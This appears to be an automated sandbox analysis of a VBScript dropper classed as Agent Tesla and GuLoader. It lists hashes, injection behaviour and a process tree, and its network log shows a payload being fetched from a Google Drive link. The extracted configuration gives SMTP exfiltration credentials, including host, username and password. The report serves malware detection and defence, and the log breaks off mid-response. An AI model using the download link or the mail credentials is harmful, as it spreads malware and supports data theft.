Analysis

max time kernel: 147s
max time network: 136s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 05/03/2024, 09:16 UTC

Static task: static1

Behavioral task: behavioral1
  Sample: arbejdsommere.vbs
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: arbejdsommere.vbs
  Resource: win10v2004-20240226-en
General

Target: arbejdsommere.vbs
Size: 26KB
MD5: f8577629aeb64e251b9cb1e099e714d0
SHA1: 5f0a623045c49b2d7ae72bcbd66ada317e4f03e2
SHA256: 8d506a06bb82e85988a2b5be1e4ec782667ef2b5252f16a46adcc75e92077ef7
SHA512: 52d6f17ce06caeaa1871a510d323598fe13fb67dacc6d01eb538bf0ad329e37fac28e33e27cf29725c08a3f40fb3a6042df5d6372dbcc499f9e00c932b69479c
SSDEEP: 768:qaIZCEG9cNFeKAqIqBW2MQK/fFXSiPwKYv:2CJcviqzjOSiPwjv
Malware Config

Extracted: agenttesla
Protocol: smtp
Host: smtp.crane-eletronics.com
Port: 587
Username: pen@crane-eletronics.com
Password: peFyHns8
Email To: info@spakmetaluae.com
Signatures

AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Guloader, Cloudeye
  A shellcode based downloader first seen in 2020.

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  3     1712  WScript.exe
  5     1712  WScript.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow  ioc
  6     drive.google.com
  7     drive.google.com
  14    drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  pid   Process
  1116  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  524   powershell.exe
  1116  wab.exe

Suspicious use of SetThreadContext (1 IoCs)
  description                         pid  Process         procid_target
  PID 524 set thread context of 1116  524  powershell.exe  34

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   Process
  1336  powershell.exe
  524   powershell.exe
  1116  wab.exe
  1116  wab.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
  pid  Process
  524  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1336  powershell.exe
  Token: SeDebugPrivilege  524   powershell.exe
  Token: SeDebugPrivilege  1116  wab.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   Process
  1116  wab.exe

Suspicious use of WriteProcessMemory (13 IoCs)
  description                       pid   Process         procid_target
  PID 1712 wrote to memory of 1336  1712  WScript.exe     28
  PID 1712 wrote to memory of 1336  1712  WScript.exe     28
  PID 1712 wrote to memory of 1336  1712  WScript.exe     28
  PID 1336 wrote to memory of 524   1336  powershell.exe  31
  PID 1336 wrote to memory of 524   1336  powershell.exe  31
  PID 1336 wrote to memory of 524   1336  powershell.exe  31
  PID 1336 wrote to memory of 524   1336  powershell.exe  31
  PID 524 wrote to memory of 1116   524   powershell.exe  34
  PID 524 wrote to memory of 1116   524   powershell.exe  34
  PID 524 wrote to memory of 1116   524   powershell.exe  34
  PID 524 wrote to memory of 1116   524   powershell.exe  34
  PID 524 wrote to memory of 1116   524   powershell.exe  34
  PID 524 wrote to memory of 1116   524   powershell.exe  34
Processes (process tree, indented by depth)

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\arbejdsommere.vbs"
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID: 1712
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: obfuscated PowerShell script passed inline as the powershell.exe argument
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1336
    C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      Command line: the same obfuscated PowerShell script, passed inline as the powershell.exe argument
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 524
      C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        PID: 1116
Network

-
DNS (remote address 8.8.8.8:53)
Request:  repository.certum.pl  IN A
Response: repository.certum.pl  IN CNAME  repository.akamai.certum.pl
          repository.akamai.certum.pl  IN CNAME  repository.certum.pl.edgekey.net
          repository.certum.pl.edgekey.net  IN CNAME  e99038.dscb.akamaiedge.net
          e99038.dscb.akamaiedge.net  IN A  23.48.165.139
          e99038.dscb.akamaiedge.net  IN A  23.48.165.155
-
DNS (remote address 8.8.8.8:53)
Request:  repository.certum.pl  IN A
-
HTTP (remote address 23.48.165.139:80)
Request:
GET /ctnca.cer HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: repository.certum.pl
Response:
HTTP/1.1 200 OK
Content-Length: 959
Strict-Transport-Security: max-age=63072000; includeSubDomains
Last-Modified: Fri, 06 Mar 2020 09:56:01 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=900
Date: Tue, 05 Mar 2024 09:16:21 GMT
Connection: keep-alive
-
DNS (remote address 8.8.8.8:53)
Request:  drive.google.com  IN A
Response: drive.google.com  IN A  172.217.169.78
-
HTTP (remote address 172.217.169.78:443)
Request:
HEAD /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: drive.google.com
Response:
HTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:16:31 GMT
Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Content-Length: 0
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-2GDSDtCErwFUZ8n5DCd3Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
HTTP (remote address 172.217.169.78:443)
Request:
GET /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
User-Agent: Microsoft BITS/7.5
Host: drive.google.com
Response:
HTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:16:33 GMT
Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-sMrbsvWa2OEKdixeJ3Cp-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
HTTP (remote address 172.217.169.78:443)
Request:
HEAD /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: drive.google.com
Response:
HTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:16:41 GMT
Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Content-Length: 0
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce--FBbVSCTIeJ-G7Zc3zsmPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
HTTP (remote address 172.217.169.78:443)
Request:
GET /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
User-Agent: Microsoft BITS/7.5
Host: drive.google.com
Response:
HTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:16:42 GMT
Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-302DIGJXnvWDHrh8bSK8QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
DNS (remote address 8.8.8.8:53)
Request:  drive.usercontent.google.com  IN A
Response: drive.usercontent.google.com  IN A  142.250.179.225
-
DNS (remote address 8.8.8.8:53)
Request:  drive.usercontent.google.com  IN A
-
HTTP HEAD https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download (remote address 142.250.179.225:443)
Request:
HEAD /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: drive.usercontent.google.com
Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Manegeklovners.u32"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, 
X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 511832
Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
Date: Tue, 05 Mar 2024 09:16:33 GMT
Expires: Tue, 05 Mar 2024 09:16:33 GMT
Cache-Control: private, max-age=0
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
HTTP GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download (remote address 142.250.179.225:443)
Request:
GET /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
User-Agent: Microsoft BITS/7.5
Host: drive.usercontent.google.com
Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Manegeklovners.u32"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, 
X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 511832
Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
Date: Tue, 05 Mar 2024 09:16:34 GMT
Expires: Tue, 05 Mar 2024 09:16:34 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=7+PVzg==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
HTTP HEAD https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download (remote address 142.250.179.225:443)
Request:
HEAD /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: drive.usercontent.google.com
Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Manegeklovners.u32"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, 
X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 511832
Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
Date: Tue, 05 Mar 2024 09:16:42 GMT
Expires: Tue, 05 Mar 2024 09:16:42 GMT
Cache-Control: private, max-age=0
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Remote address: 142.250.179.225:443
Request
GET /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
User-Agent: Microsoft BITS/7.5
Host: drive.usercontent.google.com
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
